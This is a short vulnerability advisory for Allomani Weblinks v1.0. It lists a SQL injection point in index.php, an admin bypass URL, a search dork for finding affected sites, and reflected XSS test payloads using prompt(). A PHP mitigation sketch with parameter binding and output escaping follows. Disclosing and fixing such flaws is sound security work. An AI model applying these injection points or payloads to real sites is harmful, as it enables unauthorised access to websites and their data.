Allomani Weblinks version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
Allomani Weblinks v1.0 Multiple Vulnerabilities
=====================================
Author : indoushka
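Vendor : https://www.allomani.com/
Dork : جميع الحقوق محفوظة لـ : اللوماني © 2014
برمجة اللوماني للخدمات البرمجية © 2006
(English: "All rights reserved to: Allomani © 2014" / "Programmed by Allomani Software Services © 2006")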
======================================
SQL injection :
https://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject here)
cpanel : https://127.0.0.1/public_html/admin.php
Bypass :
https://127.0.0.1/public_html/admin_menu.html
Cross site scripting (verified) :
Affected items
/public_html/admin.php
/public_html/go.php
URI was set to "onmouseover='prompt(929220)'bad=">
The input is reflected inside a tag parameter between double quotes.
URL encoded GET input id was set to 12'"()&%<ScRiPt >prompt(983476)</ScRiPt>
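
Mitigation sketch for the two input-handling findings above, added here as an example; it is not Allomani Weblinks source code or a vendor patch. The function names and the links table are hypothetical, and it assumes PHP 7.1+ with the pdo_sqlite extension: the cat and id values are accepted only as positive integers and bound as query parameters, and reflected values are escaped for a quoted attribute.

```php
<?php
declare(strict_types=1);
// Hypothetical stand-ins for the reported entry points; the table and
// column names are assumptions, not taken from the application.

/** Escape a value for output inside a quoted HTML attribute. */
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Accept only a positive decimal integer (cat, id); anything else is null. */
function positive_int($raw): ?int
{
    $ok = is_string($raw) && preg_match('/\A[1-9][0-9]{0,8}\z/', $raw) === 1;
    return $ok ? (int) $raw : null;
}

/** Browse query: the category is bound as an integer, never concatenated. */
function links_in_category(PDO $db, $rawCat): array
{
    $cat = positive_int($rawCat);
    if ($cat === null) {
        return []; // reject instead of passing the raw value to SQL
    }
    $stmt = $db->prepare('SELECT id, title FROM links WHERE cat = :cat');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE links (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)');
$db->exec("INSERT INTO links (cat, title) VALUES (1, 'Example link')");

echo count(links_in_category($db, '1')), " row(s) for cat=1\n";
echo count(links_in_category($db, "1'")), " row(s) for a non-numeric cat\n";

// The two inputs quoted in the report, rendered into a quoted attribute.
$reported = [
    "\"onmouseover='prompt(929220)'bad=\">",
    "12'\"()&%<ScRiPt >prompt(983476)</ScRiPt>",
];
foreach ($reported as $input) {
    $idState = positive_int($input) === null ? 'rejected' : 'accepted';
    echo '<span title="', attr($input), '">id ', $idState, "</span>\n";
}
```

With ENT_QUOTES both quote characters are encoded, so neither reported string can close the attribute it is reflected into.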